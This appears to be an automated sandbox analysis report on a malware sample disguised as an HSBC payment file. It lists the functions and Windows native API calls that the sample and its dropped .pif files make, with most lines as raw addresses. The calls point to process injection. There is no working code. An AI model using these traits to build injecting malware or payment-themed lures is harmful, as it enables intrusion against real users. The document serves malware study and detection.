Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A979AA NtAllocateVirtualMemory,0_2_02A979AA
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02A9D9E8
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_0042CB13 NtClose,3_2_0042CB13
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012B60 NtClose,LdrInitializeThunk,3_2_29012B60
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_29012DF0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_29012C70
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290135C0 NtCreateMutant,LdrInitializeThunk,3_2_290135C0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012B80 NtQueryInformationFile,3_2_29012B80
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012BA0 NtEnumerateValueKey,3_2_29012BA0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012BE0 NtQueryValueKey,3_2_29012BE0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012BF0 NtAllocateVirtualMemory,3_2_29012BF0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012AB0 NtWaitForSingleObject,3_2_29012AB0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012AD0 NtReadFile,3_2_29012AD0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012AF0 NtWriteFile,3_2_29012AF0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012D00 NtSetInformationFile,3_2_29012D00
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012D10 NtMapViewOfSection,3_2_29012D10
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012D30 NtUnmapViewOfSection,3_2_29012D30
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012DB0 NtEnumerateKey,3_2_29012DB0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012DD0 NtDelayExecution,3_2_29012DD0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012C00 NtQueryInformationProcess,3_2_29012C00
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012C60 NtCreateKey,3_2_29012C60
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012CA0 NtQueryInformationToken,3_2_29012CA0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012CC0 NtQueryVirtualMemory,3_2_29012CC0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012CF0 NtOpenProcess,3_2_29012CF0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012F30 NtCreateSection,3_2_29012F30
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012F60 NtCreateProcessEx,3_2_29012F60
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012F90 NtProtectVirtualMemory,3_2_29012F90
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012FA0 NtQuerySection,3_2_29012FA0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012FB0 NtResumeThread,3_2_29012FB0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012FE0 NtCreateFile,3_2_29012FE0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012E30 NtWriteVirtualMemory,3_2_29012E30
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012E80 NtReadVirtualMemory,3_2_29012E80
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012EA0 NtAdjustPrivilegesToken,3_2_29012EA0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29012EE0 NtQueueApcThread,3_2_29012EE0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29014340 NtSetContextThread,3_2_29014340
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29014650 NtSuspendThread,3_2_29014650
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290139B0 NtGetContextThread,3_2_290139B0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29013D10 NtOpenProcessToken,3_2_29013D10
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29013D70 NtOpenThread,3_2_29013D70
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29013010 NtOpenDirectoryObject,3_2_29013010
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29013090 NtSetValueKey,3_2_29013090
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029A824C NtReadVirtualMemory,5_2_029A824C
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029A84BC NtUnmapViewOfSection,5_2_029A84BC
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029ADAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,5_2_029ADAC4
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029ADA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_029ADA3C
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029A8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_029A8BA8
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029ADBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,5_2_029ADBA8
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029A79AC NtAllocateVirtualMemory,5_2_029A79AC
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029A7CF8 NtWriteVirtualMemory,5_2_029A7CF8
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029A8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_029A8BA6
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029A79AA NtAllocateVirtualMemory,5_2_029A79AA
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: 5_2_029AD9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_029AD9E8
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E8335C0 NtCreateMutant,LdrInitializeThunk,8_2_1E8335C0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_1E832C70
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_1E832DF0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832B60 NtClose,LdrInitializeThunk,8_2_1E832B60
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E833D10 NtOpenProcessToken,8_2_1E833D10
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E833D70 NtOpenThread,8_2_1E833D70
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E8339B0 NtGetContextThread,8_2_1E8339B0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E833090 NtSetValueKey,8_2_1E833090
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E833010 NtOpenDirectoryObject,8_2_1E833010
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832E80 NtReadVirtualMemory,8_2_1E832E80
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832EA0 NtAdjustPrivilegesToken,8_2_1E832EA0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832EE0 NtQueueApcThread,8_2_1E832EE0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832E30 NtWriteVirtualMemory,8_2_1E832E30
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832F90 NtProtectVirtualMemory,8_2_1E832F90
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832FA0 NtQuerySection,8_2_1E832FA0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832FB0 NtResumeThread,8_2_1E832FB0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832FE0 NtCreateFile,8_2_1E832FE0
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832F30 NtCreateSection,8_2_1E832F30
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 8_2_1E832F60 NtCreateProcessEx,8_2_1E832F60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832CA0 NtQueryInformationToken,8_2_1E832CA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832CC0 NtQueryVirtualMemory,8_2_1E832CC0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832CF0 NtOpenProcess,8_2_1E832CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832C00 NtQueryInformationProcess,8_2_1E832C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832C60 NtCreateKey,8_2_1E832C60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832DB0 NtEnumerateKey,8_2_1E832DB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832DD0 NtDelayExecution,8_2_1E832DD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832D00 NtSetInformationFile,8_2_1E832D00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832D10 NtMapViewOfSection,8_2_1E832D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832D30 NtUnmapViewOfSection,8_2_1E832D30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832AB0 NtWaitForSingleObject,8_2_1E832AB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832AD0 NtReadFile,8_2_1E832AD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832AF0 NtWriteFile,8_2_1E832AF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832B80 NtQueryInformationFile,8_2_1E832B80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832BA0 NtEnumerateValueKey,8_2_1E832BA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832BE0 NtQueryValueKey,8_2_1E832BE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832BF0 NtAllocateVirtualMemory,8_2_1E832BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E834650 NtSuspendThread,8_2_1E834650
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E834340 NtSetContextThread,8_2_1E834340
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A985D4 CreateProcessAsUserW,0_2_02A985D4
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A820C40_2_02A820C4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004028703_2_00402870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004010E03_2_004010E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0042F1433_2_0042F143
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040496A3_2_0040496A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004101D33_2_004101D3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004032303_2_00403230
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004012C03_2_004012C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E3CA3_2_0040E3CA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E3D33_2_0040E3D3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004103F33_2_004103F3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_00416B9E3_2_00416B9E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_00416BA33_2_00416BA3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E5183_2_0040E518
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E5233_2_0040E523
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004025B03_2_004025B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC68B83_2_28FC68B8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290AA9A63_2_290AA9A6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE28403_2_28FE2840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEA8403_2_28FEA840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A03_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF69623_2_28FF6962
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900E8F03_2_2900E8F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909AB403_2_2909AB40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA803_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29096BD73_2_29096BD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0CF23_2_28FD0CF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907CD1F3_2_2907CD1F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C003_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE03_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8DBF3_2_28FF8DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB53_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD003_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29022F283_2_29022F28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29000F303_2_29000F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29082F303_2_29082F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F403_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2E903_2_28FF2E90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905EFA03_2_2905EFA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0E593_2_28FE0E59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909EE263_2_2909EE26
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC83_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909CE933_2_2909CE93
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909EEDB3_2_2909EEDB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A1183_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290681583_2_29068158
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A01AA3_2_290A01AA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290941A23_2_290941A2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290981CC3_2_290981CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290720003_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD01003_2_28FD0100
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909A3523_2_2909A352
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A03E63_2_290A03E6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE3F03_2_28FEE3F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290802743_2_29080274
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290602C03_2_290602C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A05913_2_290A0591
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290844203_2_29084420
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290924463_2_29092446
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE05353_2_28FE0535
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908E4F63_2_2908E4F6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFC6E03_2_28FFC6E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290047503_2_29004750
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDC7C03_2_28FDC7C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE07703_2_28FE0770
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290759103_2_29075910
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE38E03_2_28FE38E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904D8003_2_2904D800
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE99503_2_28FE9950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFB9503_2_28FFB950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FB763_2_2909FB76
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29055BF03_2_29055BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901DBF93_2_2901DBF9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FA493_2_2909FA49
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29097A463_2_29097A46
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29053A6C3_2_29053A6C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFFB803_2_28FFFB80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29025AA03_2_29025AA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907DAAC3_2_2907DAAC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29081AA33_2_29081AA3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908DAC63_2_2908DAC6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29091D5A3_2_29091D5A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29097D733_2_29097D73
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29059C323_2_29059C32
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFFDC03_2_28FFFDC0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE3D403_2_28FE3D40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FCF23_2_2909FCF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FF093_2_2909FF09
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE9EB03_2_28FE9EB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FFB13_2_2909FFB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FA3FD23_2_28FA3FD2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FA3FD53_2_28FA3FD5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE1F923_2_28FE1F92
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE70C03_2_28FE70C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290AB16B3_2_290AB16B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901516C3_2_2901516C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEB1B03_2_28FEB1B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCF1723_2_28FCF172
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908F0CC3_2_2908F0CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290970E93_2_290970E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909F0E03_2_2909F0E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909132D3_2_2909132D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFB2C03_2_28FFB2C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE52A03_2_28FE52A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2902739A3_2_2902739A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCD34C3_2_28FCD34C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290812ED3_2_290812ED
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290975713_2_29097571
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD14603_2_28FD1460
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907D5B03_2_2907D5B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A95C33_2_290A95C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909F43F3_2_2909F43F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909F7B03_2_2909F7B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290256303_2_29025630
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290916CC3_2_290916CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004015603_1_00401560
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004020583_1_00402058
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004010E03_1_004010E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004032303_1_00403230
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004012C03_1_004012C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004033503_1_00403350
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004015533_1_00401553
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004025B03_1_004025B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004028703_1_00402870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_00401D693_1_00401D69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_00401D703_1_00401D70
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029920C45_2_029920C4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E809EB08_2_1E809EB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E801F928_2_1E801F92
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFFB18_2_1E8BFFB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFF098_2_1E8BFF09
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7C3FD58_2_1E7C3FD5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7C3FD28_2_1E7C3FD2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFCF28_2_1E8BFCF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E879C328_2_1E879C32
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81FDC08_2_1E81FDC0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E803D408_2_1E803D40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B1D5A8_2_1E8B1D5A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B7D738_2_1E8B7D73
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E845AA08_2_1E845AA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89DAAC8_2_1E89DAAC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A1AA38_2_1E8A1AA3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8ADAC68_2_1E8ADAC6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFA498_2_1E8BFA49
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B7A468_2_1E8B7A46
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E873A6C8_2_1E873A6C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81FB808_2_1E81FB80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E875BF08_2_1E875BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E83DBF98_2_1E83DBF9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFB768_2_1E8BFB76
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8038E08_2_1E8038E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E86D8008_2_1E86D800
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8959108_2_1E895910
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8099508_2_1E809950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81B9508_2_1E81B950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B16CC8_2_1E8B16CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8456308_2_1E845630
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BF7B08_2_1E8BF7B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F14608_2_1E7F1460
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BF43F8_2_1E8BF43F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89D5B08_2_1E89D5B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C95C38_2_1E8C95C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B75718_2_1E8B7571
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8052A08_2_1E8052A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81B2C08_2_1E81B2C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A12ED8_2_1E8A12ED
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E84739A8_2_1E84739A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7ED34C8_2_1E7ED34C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B132D8_2_1E8B132D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8070C08_2_1E8070C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8AF0CC8_2_1E8AF0CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B70E98_2_1E8B70E9
